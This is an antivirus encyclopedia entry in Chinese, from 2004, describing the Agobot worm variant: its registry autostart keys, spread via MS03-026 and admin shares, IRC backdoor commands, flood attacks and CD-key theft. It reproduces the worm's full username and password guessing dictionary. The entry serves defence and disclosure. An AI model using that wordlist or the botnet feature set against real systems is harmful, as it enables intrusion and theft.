病毒名称:
Worm.Agobot.3.ch.enc
类别: 蠕虫
病毒资料:
破坏方法:
病毒"高波"变种
病毒采用PE Diminisher v0.1压缩,VC++6.0编写,蠕虫。
一旦执行,病毒将自我复制系统文件夹.
它将创建下列注册表键值来使自己随Windows系统自启动:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"nVidia Chip4"="%SYSDIR%\%CURFILE%"
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices "nVidia Chip4"="%SYSDIR%\%CURFILE%"
网络传播:
该病毒利用在 windows 2000 和 XP 系统上的 Remote Procedure Call (RPC) Distributed
Component Object Model (DCOM) 漏洞。该漏洞允许攻击者获得在目标机器上完全的访问权限和执行代码权利。
通过对随机的 TCP/IP 地址的135端口的进行扫描,找到网络中存在安全漏洞的系统。
有关该漏洞的更多信息可以从下面的链接中找到:
Microsoft Security Bulletin MS03-026
另外,该病毒还会在下面的拥有完全访问权限的网络共享中生成并执行自己的拷贝:
admin$
c$
d$
e$
print$
它可以进行IPC弱口令猜测,可能的用户名、密码组合为:
用户名:
"Administrateur"
"Coordinatore"
"Administrador"
"Verwalter"
"Ospite"
"kanri"
"kanri-sha"
"admin"
"administrator"
"Default"
"Convidado"
"mgmt"
"Standard"
"User"
"Administrat"
"administrador"
"Owner"
"user"
"server"
"Test"
"Guest"
"Gast"
"Inviter"
"a"
"aaa"
"abc"
"x"
"xyz"
"Dell"
"home"
"pc"
"test"
"temp"
"win"
"asdf"
"qwer"
"OEM"
"root"
"wwwadmin"
"login"
"owner"
"mary"
"admins"
"computer"
"xp"
"OWNER"
"mysql"
"database"
"teacher"
"student"
密码:
"admin"
"Admin"
"passWord"
"Password"
"1"
"12"
"123"
"1234"
"!@#$"
"asdfgh"
"!@#$%"
"!@#$%^"
"!@#$%^&"
"!@#$%^&*"
"WindowsXP"
"windows2k"
"windowsME"
"windows98"
"windoze"
"hax"
"dude"
"owned"
"lol"
"ADMINISTRATOR"
"rooted"
"noob"
"TEMP"
"share"
"r00t"
"ROOT"
"TEST"
"SYSTEM"
"LOCAL"
"SERVER"
"Access"
"BACKUP"
"computer"
"fUCked"
"gay"
"idiot"
"Internet"
"test"
"2003"
"2004"
"backdoor"
"whore"
"wh0re"
"CNN"
"pwned"
"own"
"crash"
"passwd"
"PASSWD"
"devil"
"Linux"
"UNIX"
"feds"
"fish"
"changeme"
"ASP"
"PHP"
"666"
"BOX"
"Box"
"box"
"12345"
"123456"
"1234567"
"12345678"
"123456789"
"654321"
"54321"
"111"
"000000"
"00000000"
"11111111"
"88888888"
"pass"
"passwd"
"database"
"abcd"
"Oracle"
"sybase"
"123qwe"
"server"
"computer"
"Internet"
"super"
"123asd"
"ihavenopass"
"godblessyou"
"enable"
"xp"
"2002"
"2003"
"2600"
"0"
"110"
"111111"
"121212"
"123123"
"1234qwer"
"123abc"
"007"
"alpha"
"patrick"
"pat"
"administrator"
"root"
"sex"
"god"
"Foobar"
"a"
"aaa"
"abc"
"test"
"temp"
"win"
"pc"
"asdf"
"secret"
"qwer"
"yxcv"
"zxcv"
"home"
"xxx"
"owner"
"login"
"Login"
"Coordinatore"
"Administrador"
"Verwalter"
"Ospite"
"administrator"
"Default"
"administrador"
"admins"
"teacher"
"student"
"superman"
"supersecret"
"kids"
"penis"
"wwwadmin"
"database"
"changeme"
"test123"
"user"
"private"
"69"
"root"
"654321"
"xxyyzz"
"asdfghjkl"
"mybaby"
"vagina"
"pussy"
"leet"
"metal"
"work"
"school"
"mybox"
"box"
"werty"
"baby"
"porn"
"homework"
"secrets"
"x"
"z"
"qwertyuiop"
"secret"
"Administrateur"
"abc123"
"password123"
"red123"
"qwerty"
"admin123"
"zxcvbnm"
"poiuytrewq"
"pwd"
"pass"
"love"
"mypc"
"mypass"
"pw"
此用户名密码词典长度较长,因此建议用户最好将密码设置越复杂越好。
后门功能 :
该病毒拥有后门程序功能,它允许远程用户获取访问受感染系统的权限。
它连接到一个Internet Relay Chat (IRC)频道,并成为一种bot,等待来自恶意用户的下面命令:
发送如下的系统信息:
CPU 速度
内存大小
Windows 平台, 版本号和产品 ID
病毒正常运行时间
当前登陆的用户
使共享网络失效
结束恶意程序
通过 DNS 解析 IP 和主机名
获取病毒状态
执行 .EXE 文件
打开文件
对 DNS 缓冲区进行洪水攻击
使 DCOM 失效/ 使共享失效
对 IRC 服务器断开/重新连接
改变 IRC 服务器
加入一个频道
离开一个频道
通过 IRC 发送私人信息
通过 HTTP 或 FTP 更新病毒
从 HTTP 或 FTP 服务器下载并执行一个文件
重启电脑
关闭电脑
使当前用户退出登陆
对正在运行的所有进程列表
对目标机器执行下面的洪水攻击:
ICMP Flood 攻击
UDP Flood 攻击
SYN Flood 攻击
HTTP Flood 攻击
信息盗取:
它能够盗取用户系统信息,包括:
一些软件的CDKEY,序列号,ID,如:
BF1942 CDKey
BF1942 RtR CDKey
BF1942 SWoWWII CDKey
Chrome CDKey
Command & Conquer Generals CDKey
Counter-Strike CDKey
FIFA 2002 CDKey
FIFA 2003 CDKey
Half-Life CDKey
Hidden and Dangerous 2 CDKey
LoMaM CDKey
NFSHP2 CDKey
NHL 2002 CDKey
NHL 2003 CDKey
NOX CDKey
NWN CDKey
Nascar 2002 CDKey
Nascar 2003 CDKey
Project IGI 2 CDKey
Red Alert 2 CDKey
Red Alert CDKey
SOF2 CDKey
The Gladiato
病毒的清除法:
使用光华反病毒软件,彻底删除。
病毒演示:
病毒FAQ:
Windows下的PE病毒。
发现日期:
2004-3-10